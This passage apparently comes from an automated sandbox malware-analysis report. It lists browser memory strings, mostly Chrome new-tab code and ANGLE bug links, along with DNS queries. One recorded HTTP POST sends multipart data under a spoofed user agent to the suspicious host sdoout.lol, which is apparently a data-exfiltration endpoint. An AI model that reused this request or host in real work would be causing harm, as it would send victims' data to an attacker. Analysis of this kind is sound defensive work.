#logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: chrome.exe, 00000011.00000003.2789765310.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2790239586.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2790710500.0000259800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: EAXdwMrdIdPn.EAXdwMrdIdPn
    Source: global trafficDNS traffic detected: DNS query: t.me
    Source: global trafficDNS traffic detected: DNS query: sdoout.lol
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: apis.google.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
    Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
    Source: global trafficDNS traffic detected: DNS query: c.msn.com
    Source: global trafficDNS traffic detected: DNS query: assets.msn.com
    Source: global trafficDNS traffic detected: DNS query: api.msn.com
    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----37q1nohlnycbieu3eu3oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: sdoout.lolContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2915224736.000002E40037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2915224736.000002E40037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2915224736.000002E40037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
